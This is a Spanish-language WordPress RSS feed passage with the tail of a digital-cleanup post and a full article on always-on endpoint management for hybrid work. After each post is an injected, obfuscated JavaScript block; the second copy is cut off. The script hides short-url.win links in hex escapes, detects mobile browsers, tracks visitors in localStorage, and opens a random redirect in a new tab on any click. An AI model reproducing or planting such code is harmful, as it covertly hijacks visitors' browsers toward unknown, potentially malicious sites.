<!-- wp:paragraph -->
<p><strong>- Hacé una copia de seguridad</strong> de todos los archivos o asegúrate de que están almacenados de forma segura en la nube. La limpieza digital puede implicar muchos borrados, por lo que es fundamental asegurarse primero de que todos los archivos necesarios están almacenados de forma segura, bien organizados y no se verán afectados por el proceso de limpieza digital.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>- Decidí qué pasos dar para la limpieza digital.</strong> Las tareas de limpieza digital pueden ser grandes o pequeñas. Las pequeñas tareas, como eliminar archivos no deseados del disco duro, deben ser realizadas por cada empleado, pero algunas tareas pesadas deben ser realizadas por el departamento de TI por razones de seguridad.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/como-el-mantenimiento-puede-mejorar-el-rendimiento-de-los-dispositivos/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">95933</post-id>	</item>
		<item>
		<title>Protección, productividad y cumplimiento: por qué las empresas necesitan gestión de endpoints siempre activa</title>
		<link>https://www.todoenunclick.com/proteccion-productividad-y-cumplimiento-por-que-las-empresas-necesitan-gestion-de-endpoints-siempre-activa/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 24 Oct 2023 15:09:05 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[actualizaciones de software]]></category>
		<category><![CDATA[cumplimiento]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[gestión de activos]]></category>
		<category><![CDATA[Gestión de Endpoints]]></category>
		<category><![CDATA[protección de datos]]></category>
		<category><![CDATA[Seguridad cibernética]]></category>
		<category><![CDATA[trabajo híbrido]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=95803</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Adrian Ali" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Adrian-Ali-3.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>En un mundo híbrido, cualquier <em>endpoint</em> o dispositivo portátil que se conecta a la red, es considerado nuestra <em>nueva oficina</em>. Acá, es donde ahora se desarrollan los negocios, pero también donde los agentes de amenazas se congregan para atacar a los empleados.&nbsp; Esto ejerce presión sobre los equipos de TI para garantizar que puedan rastrear, proteger y administrar los dispositivos de manera más efectiva, permitiendo reducir el riesgo cibernético, mantener los costos bajo control y cumplir con una enorme cantidad de requisitos normativos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Todo esto se suma a una carga operativa significativa para TI, en un momento en que los equipos tienen más presión que nunca por la escasez de habilidades y la necesidad de ser más eficientes y, un número cada vez mayor de empresas está buscando una gestión de <em>endpoints</em> siempre activa para proporcionar la visibilidad y el control continuos que necesitan en un mundo en el que se trabaja desde cualquier lugar.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>El trayecto hacia terminales aún más distribuidas</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Un nuevo estudio realizado por <a href="https://press.hp.com/us/en/press-releases/2023/hp-forrester-research-release-2023-hybrid-world-report.html">Forrester Consulting y comisionado por HP</a> muestra que el 72% de las empresas encuestadas emplea un modelo híbrido, lo que significa que gran parte de la fuerza laboral es remota en un momento dado.&nbsp; Los empleados exigen un mejor equilibrio entre el trabajo y su vida personal y, en un mercado laboral ajustado, a menudo obtienen lo que quieren.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esto significa que los equipos de TI deben atender tanto el trabajo tradicional en la oficina como un entorno postpandemia más fluido, lo cual puede suponer un desafío cuando se trata de administrar los dispositivos propiedad de la empresa y de los empleados.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>No obstante, la situación está a punto de volverse aún más desafiante. Como parte de sus estrategias de trabajo híbrido, es probable que algunas empresas hagan la transición a un modelo de espacio laboral digital global; esto es, una plataforma o entorno unificado donde todas las herramientas, las aplicaciones y los recursos necesarios están disponibles para que los empleados realicen sus tareas laborales y a la cual puedan tener acceso desde cualquier parte del mundo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esto hará que los esfuerzos de gestión <em>endpoints</em> cobren aún más importancia a medida que la fuerza laboral se siga distribuyendo entre zonas horarias y continentes.&nbsp; No cabe duda de la lógica empresarial detrás de tal transición:&nbsp; permite a la empresa aprovechar un grupo más amplio de talentos, al tiempo que reduce la rotación y mejora la productividad.&nbsp; Puede requerir una inversión significativa en la experiencia de los empleados para ofrecer los espacios de trabajo digitales seguros, ágiles y eficientes que necesita el personal.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>El problema con la gestión de dispositivos <em>endpoint</em>&nbsp;</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este contexto, los equipos de TI deben enfrentarse a diversos desafíos. El primero es instalar actualizaciones a distancia. La explotación de software sin parches continúa siendo <a href="https://www.darkreading.com/threat-intelligence/three-common-initial-attack-vectors-account-for-most-ransomware-campaigns">una de las tres</a> formas de ataque más populares. Incluso si los equipos de TI toman la decisión de confiar en Microsoft al actualizar el sistema operativo y las aplicaciones de oficina, es posible que las aplicaciones menos comunes no tengan su propia infraestructura de actualización o que sus equipos de TI no quieran confiar en las actualizaciones de forma automática. Dado que los atacantes siguen de cerca las actualizaciones populares y les aplican ingeniería inversa para explotar rápidamente los dispositivos sin parches, solo se necesita un dispositivo <em>endpoint</em> expuesto para que los hackers lo utilicen como trampolín hacia la red corporativa o los servicios en la nube.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Tanto delincuentes cibernéticos motivados por el dinero como envalentonados actores estatales están al acecho de datos confidenciales y, potencialmente, de alterar operaciones críticas. Las redes domésticas menos protegidas y los puntos de acceso Wi-Fi públicos inseguros son un riesgo aún mayor. Resulta alarmante que sólo dos quintas partes (42%) de las empresas que encuestó Forrester implementen actualizaciones de firmware anualmente, mientras que un tercio (32%) solo actualiza cada dos años o menos.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Luego están los riesgos asociados con la pérdida o el robo de dispositivos y computadoras portátiles. Alrededor del <a href="https://press.hp.com/us/en/press-releases/2023/hp-announces-wolf-connect.html">70% de las empresas</a> dice que el trabajo híbrido ha incrementado esta amenaza. La mayoría de los sistemas de gestión de flotillas tiene un punto ciego importante: los dispositivos <em>endpoint</em> no se pueden localizar, bloquear ni borrar de forma remota si no están conectadas a Internet.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Por último, el área de TI tiene que depender de una protección deficiente. La mitad de los tomadores de decisiones de TI y seguridad ha citado que las soluciones inadecuadas de seguridad en los<em> endpoint</em> son obstáculos para abordar los desafíos de seguridad y gestión.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En conjunto, estos desafíos exigen no sólo una mejor seguridad de los datos y mecanismos de actualización de software, sino también una mejor gestión de activos, lo que resulta clave para reducir el riesgo cibernético y mejorar la asignación de recursos, así como el cumplimiento de políticas.&nbsp; De hecho, más de la mitad (55%) de los tomadores de decisiones de TI y seguridad menciona que maximizar la precisión de las bases de datos de activos es su principal desafío en la gestión remota de <em>endpoints</em>, junto con la seguridad de los datos (60%) y las actualizaciones de software en dispositivos remotos (55%).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>¿Por qué necesitamos una gestión siempre activa?</strong> <strong></strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Abordar estos desafíos es fundamental para cumplir con los estándares de auditoría interna y los mandatos normativos externos, así como para minimizar el potencial de daños financieros y de reputación derivados de un incidente en los<em> endpoint</em>.&nbsp; Para muchas empresas, el cifrado de disco completo es un paso fundamental.&nbsp; Sin embargo, no es el único control que necesitan.&nbsp; También son clave la gestión de activos, la copia de seguridad y restauración de dispositivos, los procesos automatizados de recuperación de dispositivos, los mecanismos de actualización del BIOS y el seguimiento de la ubicación de los dispositivos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los líderes de TI deben pensar detenidamente cómo se entregan esas capacidades. Dos tercios (67%) dicen que garantizar una comunicación segura con <em>endpoints</em> remotos es una preocupación importante para su departamento de TI. Aquí es donde entra en juego la gestión de flotillas siempre activas.&nbsp; Garantizar que las actualizaciones de software y otras instrucciones puedan enviarse a todos los dispositivos y que los datos fluyan continuamente en la otra dirección.&nbsp; De esta forma, nunca habrá retrasos en la seguridad y optimización de los entornos de trabajo distribuidos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Las soluciones de búsqueda, bloqueo y borrado que aprovechan la conectividad celular garantizan una gestión siempre activa al mitigar el riesgo cuando los dispositivos no están conectados a Internet o incluso apagados. Tres cuartas partes de los líderes de TI creen que una mejor gestión de <em>endpoints</em> como ésta tendría un impacto positivo en las operaciones y la eficiencia del negocio.  Podría mejorar la protección de datos, reducir el tiempo de inactividad, aumentar la productividad del personal, mejorar el cumplimiento e incluso disminuir los costos de TI al reducir la reparación o el reemplazo de PCs.  El lugar de trabajo del mañana llegará más rápido de lo que muchas empresas piensan. Lo que más les convendría es empezar a implementar desde ya esos planes de gestión de <em>endpoints</em>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Por:</strong> Adrián Ali, SVP &amp; MD LATAM Market</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return 